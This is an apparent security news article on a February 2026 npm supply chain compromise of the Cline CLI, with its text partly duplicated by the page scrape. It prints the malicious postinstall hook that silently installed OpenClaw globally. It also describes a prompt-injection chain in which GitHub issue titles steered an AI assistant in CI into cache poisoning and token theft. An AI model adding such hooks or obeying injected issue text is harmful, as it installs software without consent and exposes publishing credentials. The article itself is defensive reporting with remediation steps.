Cline CLI Supply Chain Attack Installs Unauthorized

Popular AI Coding Assistant Compromised

On February 17, 2026, the open-source AI coding assistant Cline CLI was compromised in a software supply chain attack that silently installed OpenClaw, a self-hosted autonomous AI agent, on developer systems. The attack exploited a compromised npm publish token to push a malicious version (2.3.0) to the npm registry, affecting approximately 4,000 downloads during an eight-hour window before the package was deprecated and replaced.

Cline is a widely-used, open-source AI coding assistant that integrates with VS Code and JetBrains IDEs. The VS Code extension and JetBrains plugin were not affected — only the npm CLI package was compromised.

Incident Details

Attribute	Value
Affected Package	cline (npm) version 2.3.0
Compromise Time	February 17, 2026, 3:26 AM PT
Window of Exposure	~8 hours (3:26 AM – 11:30 AM PT)
Downloads During Window	~4,000 (per StepSecurity)
Attack Vector	Compromised npm publish token
Malicious Payload	`postinstall` script installing `openclaw@latest` globally
Root Cause	GitHub Actions workflow misconfiguration ("Clinejection")
Patched Version	Cline CLI 2.4.0
VS Code Extension	Not affected
JetBrains Plugin	Not affected

How the Attack Worked

The Clinejection Vulnerability

Security researcher Adnan Khan identified the root cause as a workflow misconfiguration in Cline's GitHub Actions CI/CD pipeline, dubbed "Clinejection":

Excessive AI permissions — Claude (the AI assistant used in Cline's CI) received broad tool access within the default branch workflow
Prompt injection via issue titles — GitHub issue titles could inject arbitrary commands into the AI-assisted workflow
Cache poisoning — The attacker filled the GitHub Actions build cache with 10GB+ of junk data, triggering Least Recently Used (LRU) eviction of legitimate cache entries
Nightly publish workflow hijack — Poisoned cache entries replaced legitimate build artifacts in the nightly npm publish workflow
Credential theft — The attacker obtained the production npm publish token from the compromised workflow environment

The Malicious Payload

The published cline@2.3.0 package contained a single modification to package.json:

{
  "scripts": {
    "postinstall": "npm install -g openclaw@latest"
  }
}

When developers installed Cline 2.3.0 via npm install -g cline, the postinstall hook automatically executed and installed OpenClaw globally on their system. No other package files were modified — the Cline code itself remained unaltered.

What Is OpenClaw?

OpenClaw is a self-hosted autonomous AI agent that gained significant popularity in early 2026. While OpenClaw itself is not inherently malicious and does not auto-start its daemon process, the unauthorized installation raises serious concerns:

Software installed without user consent on developer systems
Potential for future remote activation or configuration changes
Trust violation in the developer toolchain
CI/CD systems may have been affected, introducing OpenClaw into build pipelines

Impact Assessment

Impact Area	Description
Developer workstations	~4,000 systems received unauthorized OpenClaw installation
CI/CD pipelines	Build systems running `npm install` with Cline dependency may be affected
Supply chain trust	Demonstrates risk of AI-assisted CI/CD workflows with excessive permissions
npm ecosystem	Another case highlighting the ongoing risk of publish token compromise
AI tool trust	Raises questions about the security of AI-powered development tools
Overall severity	Assessed as "low" by researchers — OpenClaw is not malware and does not auto-start

Timeline

Date/Time	Event
Feb 17, 3:26 AM PT	Malicious cline@2.3.0 published to npm
Feb 17, ~11:00 AM PT	Community reports unusual OpenClaw installations
Feb 17, 11:30 AM PT	Cline maintainers deprecate version 2.3.0
Feb 17 (afternoon)	Compromised npm token revoked
Feb 18	Cline 2.4.0 released as clean replacement
Feb 19	Root cause analysis published (Clinejection)
Feb 20	npm publishing updated to use OIDC via GitHub Actions

Remediation Steps

For Developers Who Installed Cline 2.3.0

Check for OpenClaw: Run which openclaw or openclaw --version to detect presence
Remove OpenClaw: Run npm uninstall -g openclaw if installed without your consent
Update Cline: Upgrade to version 2.4.0 or later
Audit npm global packages: Run npm list -g --depth=0 to check for other unexpected packages
Check CI/CD systems: Review build logs for any npm install runs between Feb 17, 3:26–11:30 AM PT

For Security Teams

Scan developer workstations for OpenClaw installations
Audit npm tokens and rotate any tokens used in CI/CD pipelines
Review GitHub Actions workflows for excessive permissions or prompt injection vectors
Implement npm provenance verification using npm audit signatures
Pin package versions in production package-lock.json files to prevent automatic updates
Monitor for postinstall scripts — Consider using --ignore-scripts flag in CI/CD environments

Lessons for AI-Powered Development

This incident highlights a growing risk as AI tools become deeply integrated into the software development lifecycle:

AI agents in CI/CD need strict permission boundaries — Claude's broad tool access in the Cline workflow enabled the cache poisoning attack
Prompt injection is a CI/CD attack vector — GitHub issue titles injecting commands into AI workflows is a novel and underappreciated threat
npm publish tokens remain high-value targets — The token-to-global-install attack chain is well-established but still effective
OIDC-based publishing is more secure — Cline has since migrated to OIDC tokens via GitHub Actions, eliminating long-lived credentials

Key Takeaways

Cline CLI 2.3.0 was compromised via a stolen npm publish token to install OpenClaw without consent
~4,000 developers affected during an 8-hour exposure window on February 17, 2026
Root cause was "Clinejection" — A GitHub Actions workflow allowed prompt injection via issue titles, leading to cache poisoning and credential theft
OpenClaw is not malware — The unauthorized AI agent does not auto-start, and overall impact is considered low
VS Code extension and JetBrains plugin were NOT affected — Only the npm CLI package was compromised
Update to Cline 2.4.0 and remove any unauthorized OpenClaw installations immediately

Sources

Popular AI Coding Assistant Compromised

Incident Details

Attribute	Value
Affected Package	cline (npm) version 2.3.0
Compromise Time	February 17, 2026, 3:26 AM PT
Window of Exposure	~8 hours (3:26 AM – 11:30 AM PT)
Downloads During Window	~4,000 (per StepSecurity)
Attack Vector	Compromised npm publish token
Malicious Payload	`postinstall` script installing `openclaw@latest` globally
Root Cause	GitHub Actions workflow misconfiguration ("Clinejection")
Patched Version	Cline CLI 2.4.0
VS Code Extension	Not affected
JetBrains Plugin	Not affected

How the Attack Worked

The Clinejection Vulnerability

Security researcher Adnan Khan identified the root cause as a workflow misconfiguration in Cline's GitHub Actions CI/CD pipeline, dubbed "Clinejection":

Excessive AI permissions — Claude (the AI assistant used in Cline's CI) received broad tool access within the default branch workflow
Prompt injection via issue titles — GitHub issue titles could inject arbitrary commands into the AI-assisted workflow
Cache poisoning — The attacker filled the GitHub Actions build cache with 10GB+ of junk data, triggering Least Recently Used (LRU) eviction of legitimate cache entries
Nightly publish workflow hijack — Poisoned cache entries replaced legitimate build artifacts in the nightly npm publish workflow
Credential theft — The attacker obtained the production npm publish token from the compromised workflow environment

The Malicious Payload

The published cline@2.3.0 package contained a single modification to package.json:

{
  "scripts": {
    "postinstall": "npm install -g openclaw@latest"
  }
}

What Is OpenClaw?

Software installed without user consent on developer systems
Potential for future remote activation or configuration changes
Trust violation in the developer toolchain
CI/CD systems may have been affected, introducing OpenClaw into build pipelines

Impact Assessment

Impact Area	Description
Developer workstations	~4,000 systems received unauthorized OpenClaw installation
CI/CD pipelines	Build systems running `npm install` with Cline dependency may be affected
Supply chain trust	Demonstrates risk of AI-assisted CI/CD workflows with excessive permissions
npm ecosystem	Another case highlighting the ongoing risk of publish token compromise
AI tool trust	Raises questions about the security of AI-powered development tools
Overall severity	Assessed as "low" by researchers — OpenClaw is not malware and does not auto-start

Timeline

Date/Time	Event
Feb 17, 3:26 AM PT	Malicious cline@2.3.0 published to npm
Feb 17, ~11:00 AM PT	Community reports unusual OpenClaw installations
Feb 17, 11:30 AM PT	Cline maintainers deprecate version 2.3.0
Feb 17 (afternoon)	Compromised npm token revoked
Feb 18	Cline 2.4.0 released as clean replacement
Feb 19	Root cause analysis published (Clinejection)
Feb 20	npm publishing updated to use OIDC via GitHub Actions

Remediation Steps

For Developers Who Installed Cline 2.3.0

Check for OpenClaw: Run which openclaw or openclaw --version to detect presence
Remove OpenClaw: Run npm uninstall -g openclaw if installed without your consent
Update Cline: Upgrade to version 2.4.0 or later
Audit npm global packages: Run npm list -g --depth=0 to check for other unexpected packages
Check CI/CD systems: Review build logs for any npm install runs between Feb 17, 3:26–11:30 AM PT

For Security Teams

Scan developer workstations for OpenClaw installations
Audit npm tokens and rotate any tokens used in CI/CD pipelines
Review GitHub Actions workflows for excessive permissions or prompt injection vectors
Implement npm provenance verification using npm audit signatures
Pin package versions in production package-lock.json files to prevent automatic updates
Monitor for postinstall scripts — Consider using --ignore-scripts flag in CI/CD environments

Lessons for AI-Powered Development

This incident highlights a growing risk as AI tools become deeply integrated into the software development lifecycle:

AI agents in CI/CD need strict permission boundaries — Claude's broad tool access in the Cline workflow enabled the cache poisoning attack
Prompt injection is a CI/CD attack vector — GitHub issue titles injecting commands into AI workflows is a novel and underappreciated threat
npm publish tokens remain high-value targets — The token-to-global-install attack chain is well-established but still effective
OIDC-based publishing is more secure — Cline has since migrated to OIDC tokens via GitHub Actions, eliminating long-lived credentials

Key Takeaways

Cline CLI 2.3.0 was compromised via a stolen npm publish token to install OpenClaw without consent
~4,000 developers affected during an 8-hour exposure window on February 17, 2026
Root cause was "Clinejection" — A GitHub Actions workflow allowed prompt injection via issue titles, leading to cache poisoning and credential theft
OpenClaw is not malware — The unauthorized AI agent does not auto-start, and overall impact is considered low
VS Code extension and JetBrains plugin were NOT affected — Only the npm CLI package was compromised
Update to Cline 2.4.0 and remove any unauthorized OpenClaw installations immediately

Cline CLI Supply Chain Attack Installs Unauthorized

Popular AI Coding Assistant Compromised

Incident Details

How the Attack Worked

The Clinejection Vulnerability

The Malicious Payload

What Is OpenClaw?

Impact Assessment

Timeline

Remediation Steps

For Developers Who Installed Cline 2.3.0

For Security Teams

Lessons for AI-Powered Development

Key Takeaways

Sources

OpenClaw AI Agent Flaws Enable Prompt Injection, 1-Click

Paid AI Accounts Are Now a Hot Underground Commodity

Supply Chain Attack Hits Widely-Used AI Package, Risking Thousands of Companies

Cline CLI Supply Chain Attack Installs Unauthorized

Popular AI Coding Assistant Compromised

Incident Details

How the Attack Worked

The Clinejection Vulnerability

The Malicious Payload

What Is OpenClaw?

Impact Assessment

Timeline

Remediation Steps

For Developers Who Installed Cline 2.3.0

For Security Teams

Lessons for AI-Powered Development

Key Takeaways

Sources

OpenClaw AI Agent Flaws Enable Prompt Injection, 1-Click

Paid AI Accounts Are Now a Hot Underground Commodity

Supply Chain Attack Hits Widely-Used AI Package, Risking Thousands of Companies